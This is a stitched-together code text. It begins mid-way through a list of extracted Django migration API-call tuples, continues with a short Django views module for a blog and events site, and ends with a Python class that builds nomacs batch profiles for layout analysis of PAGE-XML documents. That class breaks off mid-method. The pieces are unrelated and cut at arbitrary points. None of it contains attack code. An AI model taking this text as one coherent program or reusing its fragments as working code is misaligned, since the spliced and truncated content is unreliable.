'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""notification enabled"""'}), "(default=True, verbose_name='notification enabled')\n", (2175, 2226), False, 'from django.db import migrations, models\n'), ((2254, 2333), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""sites.Site"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')\n", (2271, 2333), False, 'from django.db import migrations, models\n'), ((2805, 2898), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (2821, 2898), False, 'from django.db import migrations, models\n'), ((2927, 2969), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""object ID"""'}), "(verbose_name='object ID')\n", (2943, 2969), False, 'from django.db import migrations, models\n'), ((3002, 3073), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""user\'s name"""'}), '(blank=True, max_length=50, verbose_name="user\'s name")\n', (3018, 3073), False, 'from django.db import migrations, models\n'), ((3107, 3194), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""user\'s email address"""'}), '(blank=True, max_length=254, verbose_name=\n "user\'s email address")\n', (3124, 3194), False, 'from django.db import migrations, models\n'), ((3221, 3275), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': '"""user\'s URL"""'}), '(blank=True, verbose_name="user\'s URL")\n', (3236, 3275), False, 'from django.db import migrations, models\n'), ((3305, 3442), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Check this box to keep me informed about updates."""', 'verbose_name': '"""Keep informed"""'}), "(default=False, help_text=\n 'Check this box to keep me informed about updates.', verbose_name=\n 'Keep informed')\n", (3324, 3442), False, 'from django.db import migrations, models\n'), ((3464, 3588), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Check this box to make more texts better."""', 'verbose_name': '"""Stay involved"""'}), "(default=False, help_text=\n 'Check this box to make more texts better.', verbose_name='Stay involved')\n", (3483, 3588), False, 'from django.db import migrations, models\n'), ((3614, 3671), 'django.db.models.TextField', 'models.TextField', ([], {'max_length': '(3000)', 'verbose_name': '"""comment"""'}), "(max_length=3000, verbose_name='comment')\n", (3630, 3671), False, 'from django.db import migrations, models\n'), ((3706, 3776), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'None', 'verbose_name': '"""date/time submitted"""'}), "(default=None, verbose_name='date/time submitted')\n", (3726, 3776), False, 'from django.db import migrations, models\n'), ((3810, 3910), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', ([], {'blank': '(True)', 'null': '(True)', 'unpack_ipv4': '(True)', 'verbose_name': '"""IP address"""'}), "(blank=True, null=True, unpack_ipv4=True,\n verbose_name='IP address')\n", (3838, 3910), False, 'from django.db import migrations, models\n'), ((3939, 4095), 'django.db.models.BooleanField', 
'models.BooleanField', ([], {'default': '(True)', 'help_text': '"""Uncheck this box to make the comment effectively disappear from the site."""', 'verbose_name': '"""is public"""'}), "(default=True, help_text=\n 'Uncheck this box to make the comment effectively disappear from the site.'\n , verbose_name='is public')\n", (3958, 4095), False, 'from django.db import migrations, models\n'), ((4119, 4320), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead."""', 'verbose_name': '"""is removed"""'}), '(default=False, help_text=\n \'Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead.\'\n , verbose_name=\'is removed\')\n', (4138, 4320), False, 'from django.db import migrations, models\n'), ((4346, 4526), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""content_type_set_for_textcomment"""', 'to': '"""contenttypes.ContentType"""', 'verbose_name': '"""content type"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='content_type_set_for_textcomment', to='contenttypes.ContentType',\n verbose_name='content type')\n", (4363, 4526), False, 'from django.db import migrations, models\n'), ((4545, 4624), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""sites.Site"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')\n", (4562, 4624), False, 'from django.db import migrations, models\n'), ((4652, 4834), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""textcomment_comments"""', 'to': 'settings.AUTH_USER_MODEL', 'verbose_name': '"""user"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, related_name='textcomment_comments', to=settings.\n AUTH_USER_MODEL, verbose_name='user')\n", (4669, 4834), False, 'from django.db import migrations, models\n'), ((5207, 5300), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (5223, 5300), False, 'from django.db import migrations, models\n'), ((5325, 5379), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""title"""'}), "(max_length=200, verbose_name='title')\n", (5341, 5379), False, 'from django.db import migrations, models\n'), ((5759, 5821), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""version"""'}), "(default=0, verbose_name='version')\n", (5786, 5821), False, 'from django.db import migrations, models\n'), ((5853, 5923), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""date published"""'}), "(auto_now_add=True, verbose_name='date published')\n", (5873, 5923), False, 'from django.db import migrations, models\n'), ((5955, 6023), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""date end"""'}), "(blank=True, null=True, verbose_name='date end')\n", (5975, 6023), False, 'from django.db import 
migrations, models\n'), ((6051, 6162), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'default': '(1)', 'editable': '(False)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""sites.Site"""'}), "(default=1, editable=False, on_delete=django.db.models.\n deletion.CASCADE, to='sites.Site')\n", (6068, 6162), False, 'from django.db import migrations, models\n'), ((6185, 6275), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Type"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Type')\n", (6202, 6275), False, 'from django.db import migrations, models\n'), ((6628, 6721), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (6644, 6721), False, 'from django.db import migrations, models\n'), ((6748, 6810), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""version"""'}), "(default=0, verbose_name='version')\n", (6775, 6810), False, 'from django.db import migrations, models\n'), ((6839, 6900), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(10)', 'verbose_name': '"""range"""'}), "(default=10, verbose_name='range')\n", (6866, 6900), False, 'from django.db import migrations, models\n'), ((6929, 6989), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""count"""'}), "(default=0, verbose_name='count')\n", (6956, 6989), False, 'from django.db import migrations, models\n'), ((7018, 7078), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""total"""'}), "(default=0, verbose_name='total')\n", (7045, 7078), False, 'from django.db import migrations, models\n'), ((7238, 7357), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Question"""', 'verbose_name': '"""Question"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Question', verbose_name='Question')\n", (7255, 7357), False, 'from django.db import migrations, models\n'), ((7380, 7470), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Text"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Text')\n", (7397, 7470), False, 'from django.db import migrations, models\n'), ((8005, 8098), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (8021, 8098), False, 'from django.db import migrations, models\n'), ((8411, 8443), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (8427, 8443), False, 'from django.db import migrations, models\n'), ((8469, 8520), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (8497, 8520), False, 'from django.db import migrations, models\n'), ((8549, 8583), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {}), '()\n', (8581, 
8583), False, 'from django.db import migrations, models\n'), ((8613, 8750), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'editable': '(False)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""user_ratings"""', 'to': '"""bettertexts.Rating"""'}), "(editable=False, on_delete=django.db.models.deletion.\n CASCADE, related_name='user_ratings', to='bettertexts.Rating')\n", (8630, 8750), False, 'from django.db import migrations, models\n'), ((7155, 7167), 'decimal.Decimal', 'Decimal', (['"""0"""'], {}), "('0')\n", (7162, 7167), False, 'from decimal import Decimal\n')]
|
from django.shortcuts import render
from django.views import View
from django.views.generic import ListView, DetailView, CreateView
from django.http import HttpResponseRedirect
from .models import Post, Comments, Event, EveComm
from django.urls import reverse_lazy, reverse
from django.core.mail import send_mail
from django.conf import settings
import datetime
from .forms import CommentForm, CF
class Index(View):
def get(self, request, *args, **kwargs):
return render(request, 'index.html')
class Quiz(View):
def get(self, request, *args, **kwargs):
return render(request, 'quiz.html')
class Inaug(View):
def get(self, request, *args, **kwargs):
return render(request, 'inauguration.html')
class CodHr(View):
def get(self, request, *args, **kwargs):
return render(request, 'codinghr.html')
class Blogs(ListView):
model = Post
template_name = 'blogs.html'
class Events(ListView):
#model = Event
#template_name = 'events.html'
def get(self, request, *args, **kwargs):
return render(request, 'events.html')
class Eve(ListView):
model = Event
template_name = 'eve.html'
class Article(DetailView):
model = Post
template_name = 'article.html'
class Team(View):
def get(self, request, *args, **kwargs):
return render(request, 'about.html')
class Login(View):
def get(self, request, *args, **kwargs):
return render(request, 'l1.html')
class AddC(CreateView):
model = Comments
form_class = CommentForm
template_name = 'addcomm.html'
#fields = '__all__'
def form_valid(self, form):
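        # attach the new comment to the Post whose pk is captured in the URL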
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
    success_url = reverse_lazy('blogs')
class EveC(CreateView):
model = EveComm
form_class = CF
template_name = 'addcomm.html'
# fields = '__all__'
def form_valid(self, form):
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
    success_url = reverse_lazy('events')
|
[
"django.shortcuts.render",
"django.urls.reverse_lazy"
] |
[((1739, 1760), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""blogs"""'], {}), "('blogs')\n", (1751, 1760), False, 'from django.urls import reverse_lazy, reverse\n'), ((2028, 2050), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""events"""'], {}), "('events')\n", (2040, 2050), False, 'from django.urls import reverse_lazy, reverse\n'), ((476, 505), 'django.shortcuts.render', 'render', (['request', '"""index.html"""'], {}), "(request, 'index.html')\n", (482, 505), False, 'from django.shortcuts import render\n'), ((585, 613), 'django.shortcuts.render', 'render', (['request', '"""quiz.html"""'], {}), "(request, 'quiz.html')\n", (591, 613), False, 'from django.shortcuts import render\n'), ((694, 730), 'django.shortcuts.render', 'render', (['request', '"""inauguration.html"""'], {}), "(request, 'inauguration.html')\n", (700, 730), False, 'from django.shortcuts import render\n'), ((811, 843), 'django.shortcuts.render', 'render', (['request', '"""codinghr.html"""'], {}), "(request, 'codinghr.html')\n", (817, 843), False, 'from django.shortcuts import render\n'), ((1057, 1087), 'django.shortcuts.render', 'render', (['request', '"""events.html"""'], {}), "(request, 'events.html')\n", (1063, 1087), False, 'from django.shortcuts import render\n'), ((1322, 1351), 'django.shortcuts.render', 'render', (['request', '"""about.html"""'], {}), "(request, 'about.html')\n", (1328, 1351), False, 'from django.shortcuts import render\n'), ((1431, 1457), 'django.shortcuts.render', 'render', (['request', '"""l1.html"""'], {}), "(request, 'l1.html')\n", (1437, 1457), False, 'from django.shortcuts import render\n')]
|
# -*- coding: utf-8 -*-
"""
performCVLLA.py
create profile for nomacs (CVL LA toolkit)
<NAME>
copyright Xerox 2017
READ project
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
import sys, os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
import glob
import common.Component as Component
from common.trace import traceln
from xml_formats.PageXml import PageXml
from xml_formats.PageXml import MultiPageXml
from util.Polygon import Polygon
from lxml import etree
from copy import deepcopy
class LAProcessor(Component.Component):
"""
"""
usage = ""
version = "v.01"
description = "description: Nomacs LA processor"
if sys.platform == 'win32':
cNomacs = '"C:\\Program Files\\READFramework\\bin\\nomacs.exe"'
else:
cNomacs = "/opt/Tools/src/tuwien-2017/nomacs/nomacs"
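    # nomacs batch profile template: the three %s slots receive the image file list, the output directory and the useTextRegions flag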
cCVLLAProfile = """
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\General\\useTextRegions=%s
PluginBatch\LayoutPlugin\Layout Analysis Module\computeSeparators=true
PluginBatch\LayoutPlugin\Layout Analysis Module\localBlockOrientation=false
PluginBatch\LayoutPlugin\Layout Analysis Module\maxImageSide=3000
PluginBatch\LayoutPlugin\Layout Analysis Module\minSuperPixelsPerBlock=15
PluginBatch\LayoutPlugin\Layout Analysis Module\\removeWeakTextLines=true
PluginBatch\LayoutPlugin\Layout Analysis Module\scaleMode=1
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\pluginList=Layout Analysis | Layout Analysis
SaveInfo\Compression=-1
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
SaveInfo\Mode=2
"""
#PluginBatch\pluginList="Layout Analysis | Layout Analysis;Layout Analysis | Detect Lines"
cCVLLASeparatorProfile="""
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
PluginBatch\pluginList=Layout Analysis | Detect Separator Lines
PluginBatch\LayoutPlugin\General\\useTextRegions=false
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
"""
cCVLProfileTabReg ="""
[%%General]
FileList="%s"
OutputDirPath="%s"
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
PluginBatch\pluginList=Forms Analysis | Apply template (Match)
PluginBatch\FormAnalysis\FormFeatures\\formTemplate="%s"
PluginBatch\FormAnalysis\FormFeatures\distThreshold=200
PluginBatch\FormAnalysis\FormFeatures\colinearityThreshold=20
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdLower=0.5
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdUpper=0.55
PluginBatch\FormAnalysis\FormFeatures\saveChilds=false
"""
#--- INIT -------------------------------------------------------------------------------------------------------------
def __init__(self):
"""
Always call first the Component constructor.
"""
Component.Component.__init__(self, "tableProcessor", self.usage, self.version, self.description)
self.coldir = None
self.docid= None
self.bKeepRegion = False
self.bKeepTL=False
self.bTemplate = False
self.bBaseLine = False
self.bSeparator = False
self.bRegularTextLine = False
self.sTemplateFile = None
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
def setParams(self, dParams):
"""
Always call first the Component setParams
Here, we set our internal attribute according to a possibly specified value (otherwise it stays at its default value)
"""
Component.Component.setParams(self, dParams)
if "coldir" in dParams.keys():
self.coldir = dParams["coldir"].strip()
if "docid" in dParams.keys():
self.docid = dParams["docid"].strip()
# if dParams.has_key("bRegion"):
# self.bKeepRegion = dParams["bRegion"]
if "bTL" in dParams.keys():
self.bKeepTL = dParams["bTL"]
if "bBaseline" in dParams.keys():
self.bBaseLine = dParams["bBaseline"]
if "bSeparator" in dParams.keys():
self.bSeparator = dParams["bSeparator"]
if "template" in dParams.keys():
self.bTemplate = dParams["template"]
if "regTL" in dParams.keys():
self.bRegularTextLine = dParams["regTL"]
if "templatefile" in dParams.keys():
self.sTemplateFile = dParams["templatefile"]
self.bTemplate=True
def reintegrateTextIntoCells(self,doc,lLTextLines=[]):
"""
from XMLDSTABLE
"""
def overlapX(zone1,zone2):
[a1,a2] = zone1 #self.getX(),self.getX()+ self.getWidth()
[b1,b2] = zone2 #zone.getX(),zone.getX()+ zone.getWidth()
return min(a2, b2) >= max(a1, b1)
def overlapY(zone1,zone2):
[a1,a2] = zone1 #self.getY(),self.getY() + self.getHeight()
[b1,b2] = zone2 #zone.getY(),zone.getY() + zone.getHeight()
return min(a2, b2) >= max(a1, b1)
def signedRatioOverlap(zone1,zone2):
"""
overlap self and zone
return surface of self in zone
"""
[x1,y1,x12,y12] = zone1 #self.getX(),self.getY(),self.getHeight(),self.getWidth()
[x2,y2,x22,y22] = zone2 #zone.getX(),zone.getY(),zone.getHeight(),zone.getWidth()
w1,h1 = x12-x1,y12-y1
w2,h2 = x22-x2,y22-y2
fOverlap = 0.0
# print (x1,x12),(x2,x22)
# print overlapX((x1,x12),(x2,x22))
# print (y1,y12),(y2,y22)
# print overlapY((y1,y12),(y2,y22))
# if overlapX((x1,w1),(x2,w2)) and overlapY((y1,h1),(y2,h2)):
if overlapX((x1,x12),(x2,x22)) and overlapY((y1,y12),(y2,y22)):
[x11,y11,x12,y12] = [x1,y1,x1+w1,y1+h1]
[x21,y21,x22,y22] = [x2,y2,x2+w2,y2+h2]
s1 = w1 * h1
# possible ?
if s1 == 0: s1 = 1.0
#intersection
nx1 = max(x11,x21)
nx2 = min(x12,x22)
ny1 = max(y11,y21)
ny2 = min(y12,y22)
h = abs(nx2 - nx1)
w = abs(ny2 - ny1)
inter = h * w
if inter > 0 :
fOverlap = inter/s1
else:
# if overX and Y this is not possible !
fOverlap = 0.0
return fOverlap
def bestRegionsAssignment(plgtl,lRegions):
"""
find the best (max overlap for self) region for self
"""
lOverlap=[]
for _,plg in lRegions:
lOverlap.append(signedRatioOverlap(plgtl.getBoundingBox(),plg.getBoundingBox()))
# print plgtl.getBoundingBox(), lOverlap
if max(lOverlap) == 0: return None
return lRegions[lOverlap.index(max(lOverlap))]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
lRegionsToBeDeleted = []
for i, page in enumerate(lPages):
if lLTextLines == []:
lTextLines = PageXml.getChildByName(page,'TextLine')
else: lTextLines =lLTextLines[i]
lCells = PageXml.getChildByName(page,'TableCell')
# print len(lCells),len(lTextLines)
lOCells=[]
for cell in lCells:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = cell.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
lOCells.append((cell,plg))
# find the best assignment of each text
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
cell = bestRegionsAssignment(plg,lOCells)
if cell:
c,_=cell
                    # schedule the line's original parent TextRegion for deletion (was c.parent, which pointed at the cell's parent)
                    lRegionsToBeDeleted.append(tl.getparent())
                    ## what about parent TextRegion delete at least TextRegion/TextEquiv
                    # lxml has no docCopyNode: deep-copy the TextLine into the cell
                    tlcp = deepcopy(tl)
                    c.append(tlcp)
# print c
        # deduplicate: several moved lines may share one original region
        for region in set(lRegionsToBeDeleted):
            region.getparent().remove(region)
def reinitPage(self,doc):
"""
empty page
"""
lNodes = PageXml.getChildByName(doc.getroot(),'Page')
        for node in lNodes:
            node.getparent().remove(node)
def findTemplate(self,doc):
"""
find the page where the first TableRegion occurs and extract it
"""
lT = PageXml.getChildByName(doc.getroot(),'TableRegion')
if lT == []:
return None
firstTable=lT[0]
# lazy guy!
newDoc,fakepage = PageXml.createPageXmlDocument('NLE', '', 0,0)
page=firstTable.getparent()
fakepage.set("imageFilename",page.get('imageFilename'))
fakepage.set("imageWidth",page.get('imageWidth'))
fakepage.set("imageHeight",page.get('imageHeight'))
page.getparent().remove(page)
# add table
xx =deepcopy(firstTable)
fakepage.append(xx)
return newDoc
def createRegistrationProfile(self,sTemplatefile):
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
txt= LAProcessor.cCVLProfileTabReg % (listfile,localpath.replace(os.sep,"/"),os.path.abspath("%s"%(sTemplatefile)).replace(os.sep,"/"))
        # text mode with newline translation yields CRLF on Windows
        prnfilename = "%s%s%s_reg.prn"%(self.coldir,os.sep,self.docid)
        with open(prnfilename,'w', encoding="utf-8") as f:
            f.write(txt)
return prnfilename
def createLinesProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLASeparatorProfile % (listfile,localpath)
        # text mode with newline translation yields CRLF on Windows ('wb' would raise a TypeError on a str)
        prnfilename = "%s%s%s_gl.prn"%(self.coldir,os.sep,self.docid)
        with open(prnfilename,'w', encoding="utf-8") as f:
            f.write(txt)
return prnfilename
def createLAProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLAProfile % (listfile,localpath,self.bKeepRegion)
# print txt
        # text mode with newline translation yields CRLF on Windows ('wb' would raise a TypeError on a str)
        prnfilename = "%s%s%s_la.prn"%(self.coldir,os.sep,self.docid)
        with open(prnfilename,'w', encoding="utf-8") as f:
            f.write(txt)
return prnfilename
def storeMPXML(self,lFiles):
"""
store files in lFiles as mpxml
"""
docDir = os.path.join(self.coldir+os.sep+'col',self.docid)
doc = MultiPageXml.makeMultiPageXml(lFiles)
sMPXML = docDir+".mpxml"
# print sMPXML
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
# trace("\t\t- validating the MultiPageXml ...")
# if not MultiPageXml.validate(doc):
# traceln(" *** WARNING: XML file is invalid against the schema: '%s'"%self.outputFileName)
# traceln(" Ok!")
return doc, sMPXML
def extractFileNamesFromMPXML(self,doc):
"""
        to ensure correct file order!
"""
xmlpath=os.path.abspath("%s%s%s%s%s" % (self.coldir,os.sep,'col',os.sep,self.docid))
lNd = PageXml.getChildByName(doc.getroot(), 'Page')
# for i in lNd:print i
return list(map(lambda x:"%s%s%s.xml"%(xmlpath,os.sep,x.get('imageFilename')[:-4]), lNd))
def performLA(self,doc):
"""
# for document doc
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
"""
# lNumPages = []
if self.bTemplate or self.bBaseLine or self.bSeparator:
# extract list of files sorted as in MPXML
lFullPathXMLNames = self.extractFileNamesFromMPXML(doc)
nbPages = len(lFullPathXMLNames)
## 1 generate xml files if only pxml are there
xmlpath=os.path.abspath(os.path.join (self.coldir,'col',self.docid))
lXMLNames = [ "%s%s%s"%(xmlpath,os.sep,name) for name in os.listdir(xmlpath) if os.path.basename(name)[-4:] =='.xml']
isXml = [] != lXMLNames
            if isXml:
                for name in os.listdir(xmlpath):
                    if os.path.basename(name)[-4:] == '.xml':
                        os.remove("%s%s%s"%(xmlpath,os.sep,name))
                isXml = False
isPXml = [] != [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
assert not isXml and isPXml
# recreate doc? (mpxml)
lPXMLNames = [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
if not isXml:
# copy pxml in xml
for name in lPXMLNames:
oldname = "%s%s%s" %(xmlpath,os.sep,name)
newname = "%s%s%s" % (xmlpath,os.sep,name)
newname = newname[:-5]+'.xml'
tmpdoc = etree.parse(oldname)
tmpdoc.write(newname,encoding="UTF-8", pretty_print=True,xml_declaration=True)
if self.bKeepTL:
            # keep the original TextLine elements
lTextLines=[]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
for page in lPages:
lTextLines.append(PageXml.getChildByName(page,'TextLine'))
## Table registration
if self.bTemplate:
if self.sTemplateFile is None:
templatePage = self.findTemplate(doc)
if templatePage is None:
traceln("No table found in this document: %s" % self.docid)
else:
oldOut= self.outputFileName
self.outputFileName = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
stemplatefile = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
print (stemplatefile)
self.writeDom(templatePage, True)
self.outputFileName = oldOut
prnregfilename= self.createRegistrationProfile(stemplatefile)
else:
# raise Exception, 'file template stuff: to be done'
prnregfilename= self.createRegistrationProfile(self.sTemplateFile)
job = LAProcessor.cNomacs+ " --batch %s"%(prnregfilename)
os.system(job)
traceln('table registration done: %s'% prnregfilename)
## separator detection
if self.bSeparator:
prnglfilename = self.createLinesProfile()
job = LAProcessor.cNomacs+ " --batch %s"%(prnglfilename)
os.system(job)
traceln( 'GL done: %s' % prnglfilename)
## baseline detection
if self.bBaseLine:
prnlafilename = self.createLAProfile()
            # cNomacsold was undefined; use the class-level nomacs binary path
            job = LAProcessor.cNomacs + " --batch %s"%(prnlafilename)
os.system(job)
traceln('LA done: %s' % prnlafilename)
if self.bTemplate or self.bBaseLine or self.bSeparator:
doc, sMPXML= self.storeMPXML(lFullPathXMLNames)
# Does not work with URO LA!
if self.bKeepTL:
self.reintegrateTextIntoCells(doc,lTextLines)
## text rectangles as textline region
if self.bRegularTextLine:
self.regularTextLines(doc)
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
return doc, nbPages
def regularTextLinesold(self,doc):
"""
from a baseline: create a regular TextLine:
also: for slanted baseline:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
baseline = lBL[0]
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
plg = Polygon(lXY)
line=LineString(lXY)
# 50 seems to large: the manual GT is 30 ? not always!
iHeight = 30 # in pixel
x1,y1, x2,y2 = plg.getBoundingBox()
if coord is not None:
coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
else:
print (tl)
def regularTextLines(self,doc):
"""
from a baseline: create a regular TextLine:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
